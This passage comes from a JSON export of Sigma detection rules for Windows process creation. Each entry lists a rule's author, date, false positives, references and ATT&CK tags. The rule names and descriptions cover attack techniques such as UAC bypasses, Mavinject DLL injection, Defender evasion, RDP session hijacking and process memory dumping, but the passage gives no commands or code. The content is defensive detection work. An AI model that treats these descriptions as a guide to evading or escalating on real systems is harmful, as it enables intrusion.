"https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "value": "Potentially Suspicious CMD Shell Output Redirect" }, { "description": "Detects the execution of whoami.exe with suspicious parent processes.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-08-12", "falsepositive": [ "Admin activity", "Scripts and administrative tools used in the monitored environment", "Monitoring activity" ], "filename": "proc_creation_win_whoami_parent_anomaly.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_parent_anomaly.yml" ], "tags": [ "attack.discovery", "attack.t1033", "car.2016-03-001" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", "value": "Whoami.EXE Execution Anomaly" }, { "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", "meta": { "author": "frack113, Florian Roth", "creation_date": "2021-07-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://twitter.com/gN3mes1s/status/941315826107510784", "https://twitter.com/Hexacorn/status/776122138063409152", "https://github.com/SigmaHQ/sigma/issues/3742", "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", "https://reaqta.com/2017/12/mavinject-microsoft-injector/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055.001", "attack.t1218.013" ] }, "related": [ { "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1bae753e-8e52-4055-a66d-2ead90303ca9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", "value": "Mavinject Inject DLL Into Running Process" }, { "description": "Detects execution of \"Tpmvscmgr.exe\" to create a new virtual smart card.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-15", "falsepositive": [ "Legitimate usage by an administrator" ], "filename": "proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml" ], "tags": [ "attack.execution" ] }, "uuid": "c633622e-cab9-4eaa-bb13-66a1d68b3e47", "value": "New Virtual Smart Card Created Via TpmVscMgr.EXE" }, { "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "89a9a0e0-f61a-42e5-8957-b1479565a658", "value": "UAC Bypass WSReset" }, { "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1479094189048713219", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "4f647cfa-b598-4e12-ad69-c68dd16caef8", "value": "DumpStack.log Defender Evasion" }, { "description": "Detects usage of \"rar\" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", "meta": { "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Highly likely if rar is a default archiver in the monitored environment." ], "filename": "proc_creation_win_rar_compress_data.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_compress_data.yml" ], "tags": [ "attack.collection", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6f3e2987-db24-4c78-a860-b4f4095a7095", "value": "Files Added To An Archive Using Rar.EXE" }, { "description": "Detects potential RDP Session Hijacking activity on Windows systems", "meta": { "author": "@juju4", "creation_date": "2022-12-27", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_tscon_rdp_session_hijacking.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Moti_B/status/909449115477659651", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml" ], "tags": [ "attack.execution" ] }, "uuid": "224f140f-3553-4cd1-af78-13d81bf9f7cc", "value": "Potential RDP Session Hijacking Activity" }, { "description": "Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO.", "meta": { "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti', Aaron Herman", "creation_date": "2022-01-25", "falsepositive": [ "Rare false positives could occur on servers with multiple drives." ], "filename": "proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.scythe.io/library/threat-emulation-qakbot", "https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/", "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", "value": "LOLBIN Execution From Abnormal Drive" }, { "description": "Detects the execution of msiexec.exe from an uncommon directory", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-11-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_msiexec_masquerading.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/200_okay_/status/1194765831911215104", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.005" ] }, "related": [ { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", "value": "Potential MsiExec Masquerading" }, { "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", "meta": { "author": "bohops, Bhabesh Raj", "creation_date": "2021-10-08", "falsepositive": [ "Legitimate use by VM administrator" ], "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", "https://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png", "https://github.com/vmware/open-vm-tools/blob/master/open-vm-tools/tools.conf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5687f942-867b-4578-ade7-1e341c46e99a", "value": "VMToolsd Suspicious Child Process" }, { "description": "Detects an uncommon child process of \"odbcconf.exe\" binary which normally shouldn't have any child processes.", "meta": { "author": "Harjot Singh @cyb3rjy0t", "creation_date": "2023-05-22", "falsepositive": [ "In rare occurrences where \"odbcconf\" crashes. It might spawn a \"werfault\" process", "Other child processes will depend on the DLL being registered by actions like \"regsvr\". In case where the DLLs have external calls (which should be rare). Other child processes might spawn and additional filters need to be applied." ], "filename": "proc_creation_win_odbcconf_uncommon_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://medium.com/@cyberjyot/t1218-008-dll-execution-using-odbcconf-exe-803fa9e08dac", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.008" ] }, "related": [ { "dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8e3c7994-131e-4ba5-b6ea-804d49113a26", "value": "Uncommon Child Process Spawned By Odbcconf.EXE" }, { "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", "meta": { "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_uacme.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_uacme.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", "value": "HackTool - UACMe Akagi Execution" }, { "description": "This rule detects the execution of Run Once task as configured in the registry", "meta": { "author": "Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_runonce_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA", "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", "https://twitter.com/pabraeken/status/990717080805789697", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_runonce_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "198effb6-6c98-4d0c-9ea3-451fa143c45c", "value": "Run Once Task Execution as Configured in Registry" }, { "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", "meta": { "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2018-12-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49", "https://github.com/sensepost/ruler", "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml" ], "tags": [ "attack.execution", "attack.t1059", "attack.t1202" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e212d415-0e93-435f-9e1a-f29005bb4723", "value": "Suspicious Remote Child Process From Outlook" }, { "description": "Detects potentially suspicious child processes of \"regsvr32.exe\".", "meta": { "author": "elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-05-05", "falsepositive": [ "Unlikely, but can rarely occur. Apply additional filters accordingly." ], "filename": "proc_creation_win_regsvr32_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/intelligence-insights-april-2022/", "https://www.echotrail.io/insights/search/regsvr32.exe", "https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", "value": "Potentially Suspicious Child Process Of Regsvr32" }, { "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-01-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_java_remote_debugging.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://dzone.com/articles/remote-debugging-java-applications-with-jdwp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_remote_debugging.yml" ], "tags": [ "attack.t1203", "attack.execution" ] }, "related": [ { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", "value": "Java Running with Remote Debugging" }, { "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", "meta": { "author": "Florian Roth (Nextron Systems), Elastic (idea)", "creation_date": "2022-09-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_icmluautil.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", "value": "UAC Bypass via ICMLuaUtil" }, { "description": "Detects execution of \"rundll32\" with potential obfuscated ordinal calls", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_obfuscated_ordinal_call.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "43fa5350-db63-4b8f-9a01-789a427074e1", "value": "Potential Obfuscated Ordinal Call Via Rundll32" }, { "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-12-07", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_dinjector.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20211001064856/https://github.com/snovvcrash/DInjector", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_dinjector.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d78b5d61-187d-44b6-bf02-93486a80de5a", "value": "HackTool - DInjector PowerShell Cradle Execution" }, { "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "creation_date": "2022-12-24", "falsepositive": [ "Legitimate use via Intune management. You exclude script paths and names to reduce FP rate" ], "filename": "proc_creation_win_agentexecutor_potential_abuse.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/jseerden/status/1247985304667066373/photo/1", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", "https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension", "https://twitter.com/lefterispan/status/1286259016436514816", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", "value": "AgentExecutor PowerShell Execution" }, { "description": "Detects the use of 3proxy, a tiny free proxy server", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-09-13", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_pua_3proxy_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://github.com/3proxy/3proxy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_3proxy_execution.yml" ], "tags": [ "attack.command-and-control", "attack.t1572" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f38a82d2-fba3-4781-b549-525efbec8506", "value": "PUA - 3Proxy Execution" }, { "description": "Detects shell32.dll executing a DLL in a suspicious directory", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-11-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.group-ib.com/resources/threat-research/red-curl-2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "32b96012-7892-429e-b26c-ac2bf46066ff", "value": "Shell32 DLL Execution in Suspicious Directory" }, { "description": "Detects the use of \"DumpMinitool.exe\" a tool that allows the dump of process memory via the use of the \"MiniDumpWriteDump\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2022-04-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_dumpminitool_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/", "https://twitter.com/mrd0x/status/1511415432888131586", "https://twitter.com/mrd0x/status/1511489821247684615", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dee0a7a3-f200-4112-a99b-952196d81e42", "value": "DumpMinitool Execution" }, { "description": "Detects usage of attrib.exe to hide files from users.", "meta": { "author": "Sami Ruohonen", "creation_date": "2019-01-16", "falsepositive": [ "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", "Msiexec.exe hiding desktop.ini" ], "filename": "proc_creation_win_attrib_hiding_files.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.uptycs.com/blog/lolbins-are-no-laughing-matter", "https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.001" ] }, "related": [ { "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4281cb20-2994-4580-aa63-c8b86d019934", "value": "Hiding Files with Attrib.exe" }, { "description": "Detect use of X509Enrollment", "meta": { "author": "frack113", "creation_date": "2022-12-23", "falsepositive": [ "Legitimate administrative script" ], "filename": "proc_creation_win_powershell_x509enrollment.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_x509enrollment.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "114de787-4eb2-48cc-abdb-c0b449f93ea4", "value": "Suspicious X509Enrollment - Process Creation" }, { "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", "meta": { "author": "Nextron Systems, @Kostastsale", "creation_date": "2022-06-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sdiagnhost_susp_child.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", "https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/", "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", "https://twitter.com/nao_sec/status/1530196847679401984", "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1218" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f3d39c45-de1a-4486-a687-ab126124f744", "value": "Sdiagnhost Calling Suspicious Child Process" }, { "description": "Detects the creation of a scheduled task using the \"-XML\" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence", "meta": { "author": "Swachchhanda Shrawan Poudel, Elastic (idea)", "creation_date": "2023-04-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-", "https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1036.005", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c", "value": "Suspicious Scheduled Task Creation via Masqueraded XML File" }, { "description": "Detect usage of the \"driverquery\" utility. Which can be used to perform reconnaissance on installed drivers", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-19", "falsepositive": [ "Legitimate use by third party tools in order to investigate installed drivers" ], "filename": "proc_creation_win_driverquery_usage.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/", "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/", "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "a20def93-0709-4eae-9bd2-31206e21e6b2", "value": "DriverQuery.EXE Execution" }, { "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", "meta": { "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "creation_date": "2021-12-07", "falsepositive": [ "Administrator, hotline ask to user" ], "filename": "proc_creation_win_susp_network_command.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_command.yml" ], "tags": [ "attack.discovery", "attack.t1016" ] }, "related": [ { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a29c1813-ab1f-4dde-b489-330b952e91ae", "value": "Suspicious Network Command" }, { 